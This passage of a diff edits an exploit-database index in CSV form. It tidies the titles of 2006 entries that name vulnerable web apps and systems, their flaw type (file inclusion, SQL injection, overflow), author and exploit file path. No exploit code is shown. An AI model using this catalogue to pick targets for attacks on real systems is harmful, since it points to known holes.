Inclusion",2006-09-07,ddoshomo,php,webapps,0 2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 @@ -2035,16 +2035,16 @@ id,file,description,date,author,platform,type,port 2336,platforms/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - (root_dir) Remote File Inclusion",2006-09-09,Kacper,php,webapps,0 2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 2338,platforms/linux/local/2338.c,"openmovieeditor 0.0.20060901 - (name) Local Buffer Overflow",2006-09-09,Qnix,linux,local,0 -2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - (classified_path) File Include",2006-09-09,MercilessTurk,php,webapps,0 +2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - (classified_path) File Inclusion",2006-09-09,MercilessTurk,php,webapps,0 2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - 'config.php' Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0 -2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Include",2006-09-10,Eddy_BAck0o,php,webapps,0 +2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Inclusion",2006-09-10,Eddy_BAck0o,php,webapps,0 2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion",2006-09-10,Solpot,php,webapps,0 2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 Beta - (skiny) Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - (config) Remote File Inclusion",2006-09-11,basher13,php,webapps,0 2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - 'INCLUDE_PATH' Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,php,webapps,0 -2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 +2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - (Poison Null Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - 'functions.php' Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - (abs_pfad) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - (form) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 @@ -2063,14 +2063,14 @@ id,file,description,date,author,platform,type,port 2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0 2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Remote File Inclusion / Local File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0 2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Inclusion",2006-09-14,Solpot,php,webapps,0 -2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component 0.4.4 - File Include",2006-09-14,"Mehmet Ince",php,webapps,0 +2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component 0.4.4 - File Inclusion",2006-09-14,"Mehmet Ince",php,webapps,0 2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0 2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - (PP_PATH) Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0 2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - (com_contact) Remote Code Execution",2006-09-15,rgod,php,webapps,0 2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 - (tr) SQL Injection",2006-09-15,"Fix TR",asp,webapps,0 2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0 2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion",2006-09-15,Kacper,php,webapps,0 -2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 +2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Arbitrary File Upload",2006-09-15,simo64,php,webapps,0 2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution",2006-09-16,simo64,php,webapps,0 2377,platforms/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,php,webapps,0 @@ -2085,9 +2085,9 @@ id,file,description,date,author,platform,type,port 2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0 2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 -2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 +2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0 2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 -2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 +2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0 2394,platforms/php/webapps/2394.php,"more.groupware 0.74 - (new_calendarid) SQL Injection",2006-09-19,x128,php,webapps,0 @@ -2097,7 +2097,7 @@ id,file,description,date,author,platform,type,port 2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusion",2006-09-19,ajann,php,webapps,0 2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0 2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer - (VML) Remote Denial of Service (PoC)",2006-09-19,Shirkdog,windows,dos,0 -2401,platforms/windows/remote/2401.c,"WS_FTP LE 5.08 - (PASV response) Remote Buffer Overflow",2006-09-20,h07,windows,remote,0 +2401,platforms/windows/remote/2401.c,"WS_FTP LE 5.08 - (PASV Response) Remote Buffer Overflow",2006-09-20,h07,windows,remote,0 2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0 2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow",2006-09-20,nop,windows,remote,0 2404,platforms/linux/local/2404.c,"Dr.Web AntiVirus 4.33 - (LHA long Directory name) Local Overflow",2006-09-20,Guay-Leroux,linux,local,0 @@ -2110,8 +2110,8 @@ id,file,description,date,author,platform,type,port 2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 2412,platforms/windows/local/2412.c,"Microsoft Windows - Kernel Privilege Escalation (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 -2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - File Include / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0 -2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0 +2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0 +2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution",2006-09-22,rgod,php,webapps,0 2416,platforms/asp/webapps/2416.txt,"xweblog 2.1 - (kategori.asp) SQL Injection",2006-09-22,Muhacir,asp,webapps,0 2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - 'index.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0 2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - (all_users.php) SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0 @@ -2125,16 +2125,16 @@ id,file,description,date,author,platform,type,port 2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer (VML) - Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Include",2006-09-25,SHiKaA,php,webapps,0 +2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2431,platforms/php/webapps/2431.txt,"evoBB 0.3 - (path) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Include",2006-09-25,SHiKaA,php,webapps,0 +2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"WEB//NEWS 1.4 - (parser.php) Remote File Inclusion",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 -2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Include",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 +2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0 @@ -2144,7 +2144,7 @@ id,file,description,date,author,platform,type,port 2446,platforms/php/webapps/2446.php,"PPA Gallery 1.0 - (functions.inc.php) Remote File Inclusion",2006-09-28,Kacper,php,webapps,0 2447,platforms/php/webapps/2447.php,"KGB 1.87 - (Local Inclusion) Remote Code Execution",2006-09-28,Kacper,php,webapps,0 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (HTML)",2006-09-28,jamikazu,windows,remote,0 -2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Include",2006-09-28,D_7J,php,webapps,0 +2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) 2.0 - 'config.inc.php' File Inclusion",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - 'index.php' Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"PHPMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"PHPSecurePages 0.28b - (secure.php) Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 @@ -2158,8 +2158,8 @@ id,file,description,date,author,platform,type,port 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (2)",2006-09-29,LukeHack,windows,remote,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - (yesno.phtml) Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 -2463,platforms/osx/local/2463.c,"Apple Mac OS X 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 -2464,platforms/osx/local/2464.pl,"Apple Mac OS X 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 +2463,platforms/osx/local/2463.c,"Apple Mac OSX 10.4.7 - Mach Exception Handling Privilege Escalation",2006-09-30,xmath,osx,local,0 +2464,platforms/osx/local/2464.pl,"Apple Mac OSX 10.4.7 - Mach Exception Handling Local Exploit (10.3.x)",2006-09-30,"Kevin Finisterre",osx,local,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 2466,platforms/linux/local/2466.pl,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation",2006-10-01,"Clint Torrez",linux,local,0 2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 @@ -2167,18 +2167,18 @@ id,file,description,date,author,platform,type,port 2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0 2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - (FrontPage.php) Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 -2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 +2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - (show_hlp.php) File Inclusion",2006-10-03,Kacper,php,webapps,0 2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 - readfile() & SQL Injection",2006-10-03,1nf3ct0r,php,webapps,0 2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0 -2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Include",2006-10-04,SpiderZ,php,webapps,0 +2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Inclusion",2006-10-04,SpiderZ,php,webapps,0 2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - (footer.php) Remote File Inclusion",2006-10-04,mozi,php,webapps,0 -2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 +2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0 2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0 2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps,0 2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0 2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0 2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - (POST) Remote Buffer Overflow",2006-10-05,SkOd,windows,remote,0 -2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 - File Include",2006-10-06,"Mehmet Ince",php,webapps,0 +2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker 1.0 - File Inclusion",2006-10-06,"Mehmet Ince",php,webapps,0 2484,platforms/php/webapps/2484.txt,"FreeForum 0.9.7 - 'forum.php' Remote File Inclusion",2006-10-07,"Mehmet Ince",php,webapps,0 2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - (lire.php) SQL Injection",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod - Inclusion",2006-10-07,bd0rk,php,webapps,0 @@ -2204,14 +2204,14 @@ id,file,description,date,author,platform,type,port 2506,platforms/php/webapps/2506.txt,"Foafgen 0.3 - (redir.php) Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0 2508,platforms/php/webapps/2508.txt,"vtiger CRM 4.2 - (calpath) Multiple Remote File Inclusion",2006-10-10,the_day,php,webapps,0 -2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - (photo_comment.php) File Include Exploit",2006-10-10,Kacper,php,webapps,0 +2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - (photo_comment.php) File Inclusion",2006-10-10,Kacper,php,webapps,0 2510,platforms/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - (import.lib.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 2511,platforms/php/webapps/2511.txt,"PHPLibrary 1.5.3 - (grid3.lib.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 2512,platforms/php/webapps/2512.txt,"Jinzora 2.1 - (media.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 2513,platforms/php/webapps/2513.txt,"ae2 - (standart.inc.php) Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e - (naboard_pnr.php) Remote File Inclusion",2006-10-11,mdx,php,webapps,0 2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 -2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Include",2006-10-11,"Nima Salehi",php,webapps,0 +2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - (scriptpath) Multiple Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 @@ -2223,19 +2223,19 @@ id,file,description,date,author,platform,type,port 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - readfile() / SQL Injection",2006-10-12,ShadOS,php,webapps,0 -2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Include",2006-10-12,Kw3[R]Ln,php,webapps,0 +2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps,0 2529,platforms/php/webapps/2529.txt,"AFGB Guestbook 2.2 - (Htmls) Remote File Inclusion",2006-10-12,mdx,php,webapps,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Inclusion",2006-10-12,r0ut3r,php,webapps,0 -2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - (menu.inc.php) File Include",2006-10-13,k1tk4t,php,webapps,0 +2535,platforms/php/webapps/2535.txt,"PHPMyConferences 8.0.2 - (menu.inc.php) File Inclusion",2006-10-13,k1tk4t,php,webapps,0 2536,platforms/php/webapps/2536.txt,"Open Conference Systems 1.1.4 - (fullpath) File Inclusion",2006-10-13,k1tk4t,php,webapps,0 2537,platforms/php/webapps/2537.pl,"maluinfo 206.2.38 - (bb_usage_stats.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2538,platforms/php/webapps/2538.pl,"phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2539,platforms/php/webapps/2539.txt,"Genepi 1.6 - (genepi.php) Remote File Inclusion",2006-10-13,Kw3[R]Ln,php,webapps,0 -2540,platforms/php/webapps/2540.txt,"Cdsagenda 4.2.9 - (SendAlertEmail.php) File Include",2006-10-13,Drago84,php,webapps,0 +2540,platforms/php/webapps/2540.txt,"Cdsagenda 4.2.9 - (SendAlertEmail.php) File Inclusion",2006-10-13,Drago84,php,webapps,0 2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 (libnspr) - Arbitrary File Creation Privilege Escalation",2006-10-13,"Marco Ivaldi",solaris,local,0 @@ -2260,7 +2260,7 @@ id,file,description,date,author,platform,type,port 2562,platforms/php/webapps/2562.txt,"AROUNDMe 0.5.2 - (templatePath) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - (lang_path) Remote File Inclusion",2006-10-15,r0ut3r,php,webapps,0 2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps,0 -2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OS X) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 +2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0 2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - (comadd.php) SQL Injection",2006-10-15,SHiKaA,php,webapps,0 2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection",2006-10-15,Kiba,php,webapps,0 @@ -2275,7 +2275,7 @@ id,file,description,date,author,platform,type,port 2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0 2578,platforms/php/webapps/2578.txt,"PHPMyManga 0.8.1 - (template.php) Multiple File Inclusion",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection (PoC)",2006-10-16,ShAnKaR,php,webapps,0 -2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OS X) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 +2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - (root file create) Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0 2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Inclusion",2006-10-17,nuffsaid,php,webapps,0 2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - (prestart.php) Remote Code Execution",2006-10-17,Kacper,php,webapps,0 @@ -2297,7 +2297,7 @@ id,file,description,date,author,platform,type,port 2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 -2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Include",2006-10-19,x_w0x,php,webapps,0 +2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Inclusion",2006-10-19,x_w0x,php,webapps,0 2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Inclusion",2006-10-20,MP,php,webapps,0 2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - (quiz.php) SQL Injection",2006-10-20,ajann,php,webapps,0 2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 @@ -2323,7 +2323,7 @@ id,file,description,date,author,platform,type,port 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - (ADODB Execute) Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 -2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 +2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Inclusion",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 @@ -2335,8 +2335,8 @@ id,file,description,date,author,platform,type,port 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - Constructor Privilege Escalation",2006-10-24,"Marco Ivaldi",solaris,local,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 